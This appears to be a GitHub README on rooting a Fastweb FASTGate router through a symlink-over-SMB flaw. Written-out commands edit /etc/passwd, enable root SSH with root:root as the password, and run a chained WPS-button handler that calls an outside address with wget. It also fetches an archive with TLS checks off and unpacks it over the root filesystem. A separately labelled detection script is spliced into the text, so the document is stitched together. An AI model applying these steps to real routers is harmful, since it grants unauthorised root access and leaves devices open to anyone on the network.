classy-giraffe/FastgateRoot

Fastgate Rooting

How to get full access to your Fastgate, a widely used router distributed by the ISP Fastweb in Italy.

How does it work?

This trick uses a very old flaw present in a good majority of Technicolor routers. As explained later, you can trick the router into displaying the content of its root folder by crafting a special symbolic link, putting it on a USB drive, and navigating the filesystem over SMB.
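A defender-side check for the flaw described above, as an added example that is not part of the original README: it scans a directory tree, such as a mounted USB drive, for symbolic links that resolve outside that tree. The function name `find_escaping_links` is an assumption of this example, and it relies on `readlink -f` as provided by GNU coreutils or BusyBox.

```shell
#!/bin/sh
# Added example, not part of the original README.
# find_escaping_links DIR
#   Prints "LINK -> TARGET" for every symbolic link under DIR whose resolved
#   target lies outside DIR (for example a link to /), plus links that cannot
#   be resolved at all. Returns 0 if the tree is clean, 1 if anything was
#   reported, 2 if DIR is not a directory.
find_escaping_links() {
    [ -d "$1" ] || return 2
    # Physical path of the tree, so the prefix comparison below is reliable.
    root=$(cd "$1" 2>/dev/null && pwd -P) || return 2
    # "find -type l" lists links without following them; the inner shell
    # canonicalises each link and compares it against the tree root.
    out=$(find "$root" -type l -exec sh -c '
        root=$1; shift
        for link in "$@"; do
            target=$(readlink -f "$link" 2>/dev/null)
            case "$target" in
                "")                printf "%s -> (unresolved)\n" "$link" ;;
                "$root"|"$root"/*) ;;   # stays inside the tree
                *)                 printf "%s -> %s\n" "$link" "$target" ;;
            esac
        done' sh "$root" {} +)
    [ -n "$out" ] || return 0
    printf '%s\n' "$out"
    return 1
}

# Stand-alone use: sh script.sh /path/to/mounted/drive
if [ "$#" -gt 0 ]; then
    find_escaping_links "$1"
fi
```

Absolute targets are resolved against the filesystem of the machine running the check, so a link to `/` is always reported.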

Getting Started

Requirements

  • A FASTGate DGA4131 (VBNT-O).
  • A USB drive.
  • A Linux machine (a live version of Ubuntu should be ok, probably WSL too).

Instructions

  • Open up a terminal, navigate to the USB Drive path and type the following: ln -s / rootlink.
  • Open up a browser and log in to the FASTGate admin page (it's usually available here).
  • Once you are logged in, click here.
  • Plug the USB Drive into your router.
  • Navigate to \\192.168.1.254\usbdisk\rootlink using an SMB client.
  • Now you should be able to access the root folder of the router.
  • Edit /etc/inittab by removing the '#' from the last line, ::askconsole:/bin/login; if there is no '#', just leave the line as it is. This should turn the console login on, in case you screw up.
  • Edit /etc/passwd by replacing root:/bin/false with root:/bin/ash. This gives root a usable shell when logging in.
  • Edit /etc/config/dropbear as follows (delete every other config involving SSH in this file, if there is any):
config dropbear 'Example'
  option Interface 'lan'
  option Port '22'
  option IdleTimeout '600'
  option PasswordAuth 'on'
  option RootPasswordAuth 'on'
  option RootLogin '1'
  option enable '1'
  • Edit /etc/config/button by changing option handler 'wps_button_pressed_ssh.sh' as follows, leaving everything else at its default:
config button 'wps'
...
option handler 'sed -i '\''s#/root:.*$#/root:/bin/ash#'\'' /etc/passwd && echo root:root | chpasswd && sed -i '\''s/#//'\'' /etc/inittab && (uci -q delete dropbear.afg || true) && uci add dropbear dropbear && uci rename dropbear.@dropbear[-1]=afg && uci set dropbear.afg.enable='\''1'\'' && uci set dropbear.afg.Interface='\''lan'\'' && uci set dropbear.afg.Port='\''22'\'' && uci set dropbear.afg.IdleTimeout='\''600'\'' && uci set dropbear.afg.PasswordAuth='\''on'\'' && uci set dropbear.afg.RootPasswordAuth='\''on'\'' && uci set dropbear.afg.RootLogin='\''1'\'' && uci commit dropbear && /etc/init.d/dropbear enable && /etc/init.d/dropbear restart && uci set button.wps.handler='\''wps_button_pressed.sh'\'' && uci commit && wget http://58.162.0.1/done || true'
  • Now press the WPS button on the router; this should start a Dropbear SSH server on port 22.
  • You can now log in to your router via SSH, using root as both username and password.
  • You can now proceed to install Ansuel GUI (a custom GUI):
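# Note: -k skips TLS certificate verification, so the archive is not authenticated before it is unpacked over / as root.
curl -k https://raw.githubusercontent.com/Ansuel/gui-dev-build-auto/master/GUI.tar.bz2 --output /tmp/GUI.tar.bz2
# Unpack the archive over the root filesystem.
bzcat /tmp/GUI.tar.bz2 | tar -C / -xvf -
/etc/init.d/rootdevice force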
  • Enjoy your brand new router!
